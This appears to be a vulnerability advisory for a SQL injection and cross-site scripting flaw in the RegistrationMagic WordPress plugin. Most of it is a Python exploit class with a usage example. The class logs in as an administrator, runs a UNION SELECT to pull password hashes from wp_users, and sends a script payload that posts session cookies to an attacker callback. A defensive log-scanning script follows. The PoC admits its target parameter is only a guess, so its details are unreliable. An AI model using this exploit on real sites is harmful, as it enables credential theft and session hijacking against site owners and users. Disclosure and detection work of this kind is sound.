Security Vulnerability Report
CVE-2025-11204 CVSS 7.2 HIGH

CVE-2025-11204

Published: 2025-10-08 05:15:31
Last Modified: 2026-04-15 00:35:42

Description

The RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 6.0.6.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator access or higher, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. An unauthenticated attacker could utilize an injected Cross-Site Scripting via user-agent on form submission to leverage this to achieve Reflected Cross-Site Scripting.

CVSS Details

CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

RegistrationMagic plugin < 6.0.6.2
All versions 6.0.6.2 and below are affected

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-11204 - RegistrationMagic SQL Injection PoC
# Vulnerability Location: class_rm_reports_service.php (Reports Service)
# Affected Versions: <= 6.0.6.2

import requests
import re
from urllib.parse import urljoin


class RegistrationMagicSQLi:
    def __init__(self, target_url, admin_user, admin_pass):
        self.target_url = target_url.rstrip('/')
        self.session = requests.Session()
        self.admin_user = admin_user
        self.admin_pass = admin_pass
        self.cookies = {}

    def login(self):
        """Step 1: Authenticate as WordPress administrator"""
        login_url = urljoin(self.target_url, '/wp-login.php')
        data = {
            'log': self.admin_user,
            'pwd': self.admin_pass,
            'wp-submit': 'Log In',
            'redirect_to': urljoin(self.target_url, '/wp-admin/'),
            'testcookie': '1'
        }
        self.session.get(login_url)  # Get cookies first
        resp = self.session.post(login_url, data=data, allow_redirects=True)
        if 'wordpress_logged_in' in str(self.session.cookies):
            print("[+] Login successful")
            return True
        return False

    def exploit_sqli(self, payload):
        """Step 2: Inject SQL payload into vulnerable parameter"""
        # The vulnerable endpoint is in the reports service
        exploit_url = urljoin(self.target_url, '/wp-admin/admin.php?page=rm_reports')
        params = {
            'rm_filter': payload  # Example vulnerable parameter
        }
        headers = {
            'User-Agent': 'Mozilla/5.0 (compatible; RegistrationMagic-Exploit)'
        }
        resp = self.session.get(exploit_url, params=params, headers=headers)
        return resp.text

    def extract_passwords(self):
        """Step 3: Extract admin password hashes via UNION-based SQLi"""
        # Example UNION-based payload to extract user credentials
        # Note: Actual column count must be determined first
        payload = "1' UNION SELECT user_login, user_pass, user_email FROM wp_users-- -"
        result = self.exploit_sqli(payload)
        # Extract password hashes from response
        hashes = re.findall(r'\$P\$[A-Za-z0-9./]{53}', result)
        return hashes

    def xss_via_user_agent(self, callback_url):
        """Step 4: Unauthenticated XSS via User-Agent header"""
        # Craft XSS payload for form submission User-Agent
        xss_payload = f'<script>fetch("{callback_url}?cookie="+document.cookie)</script>'
        form_url = urljoin(self.target_url, '/?rm_form_submit=1')
        headers = {
            'User-Agent': xss_payload
        }
        resp = requests.get(form_url, headers=headers)
        return resp.status_code


# Usage example:
# exploit = RegistrationMagicSQLi('http://target-wordpress-site.com', 'admin', 'password123')
# if exploit.login():
#     passwords = exploit.extract_passwords()
#     print(f"Extracted hashes: {passwords}")
```
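As an added defensive example (not part of this report or the plugin's code), the script below scans web-server access-log lines for the request patterns the PoC above relies on: SQL keywords in the admin reports page query string and a script tag in the User-Agent of a form-submission request. The log lines are constructed, and the `page=rm_reports` and `rm_form_submit` values are taken from the PoC's own assumptions rather than confirmed plugin routes.

```python
# Added defensive example: flag access-log entries matching the CVE-2025-11204
# exploitation patterns (admin reports page SQLi, script tag in User-Agent on a
# form submission). Log lines are constructed; endpoint/parameter names follow
# the PoC's assumptions, not confirmed plugin internals.
import re
from urllib.parse import unquote_plus

# Apache/nginx "combined" format:
# ip - - [time] "METHOD path HTTP/x" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

SQLI_RE = re.compile(r"(?i)\bunion\b.*\bselect\b|\bwp_users\b|'\s*--|'\s*(or|and)\s+\d+\s*=\s*\d+")
XSS_RE = re.compile(r"(?i)<\s*script|\bon(load|error|click|mouseover|focus)\s*=|javascript:")


def analyze_line(line):
    """Return a list of finding tags for one log line; empty means nothing suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsable"]
    path = unquote_plus(m.group("path"))  # decode %27, '+' etc. before matching
    ua = unquote_plus(m.group("ua"))
    findings = []
    # Authenticated SQLi surface from the advisory: the plugin's admin reports page
    if "page=rm_reports" in path and SQLI_RE.search(path):
        findings.append("rm_reports_sqli")
    # Unauthenticated vector: script payload carried in User-Agent on a form submission
    if XSS_RE.search(ua):
        findings.append("ua_xss" if "rm_form_submit" in path else "ua_xss_other")
    if "RegistrationMagic-Exploit" in ua:  # literal User-Agent the PoC sends
        findings.append("poc_user_agent")
    return findings


def scan(lines):
    """Map line index -> findings for every suspicious line."""
    out = {}
    for i, line in enumerate(lines):
        f = analyze_line(line)
        if f:
            out[i] = f
    return out


# Constructed sample log lines (not real traffic)
SAMPLE_LOG = [
    '10.0.0.5 - - [08/Oct/2025:10:00:01 +0000] "GET /wp-admin/admin.php?page=rm_reports&rm_filter=1%27+UNION+SELECT+user_login,user_pass,user_email+FROM+wp_users--+- HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (compatible; RegistrationMagic-Exploit)"',
    '10.0.0.6 - - [08/Oct/2025:10:00:02 +0000] "GET /?rm_form_submit=1 HTTP/1.1" 200 310 "-" "<script>alert(document.domain)</script>"',
    '10.0.0.7 - - [08/Oct/2025:10:00:03 +0000] "GET /wp-admin/admin.php?page=rm_reports&rm_filter=3 HTTP/1.1" 200 4800 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for idx, tags in scan(SAMPLE_LOG).items():
        print(idx, tags)
```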

References

https://plugins.trac.wordpress.org/browser/custom-registration-form-builder-with-submission-manager/trunk/services/class_rm_reports_service.php?rev=3360241 (class_rm_reports_service.php at rev 3360241, the reports service named in the PoC)
https://plugins.trac.wordpress.org/changeset/3374106/custom-registration-form-builder-with-submission-manager/trunk?contextall=1&old=3366909&old_path=%2Fcustom-registration-form-builder-with-submission-manager%2Ftrunk (plugin trunk changeset 3374106)
https://wordpress.org/plugins/custom-registration-form-builder-with-submission-manager/
https://www.wordfence.com/threat-intel/vulnerabilities/id/4532cb38-453b-460c-879d-6f0e1caacafc?source=cve

Record Data

Weakness: CWE-89 (SQL Injection)
Vulnerability status: Deferred
CVSS v3.1 exploitability subscore: 1.2; impact subscore: 5.9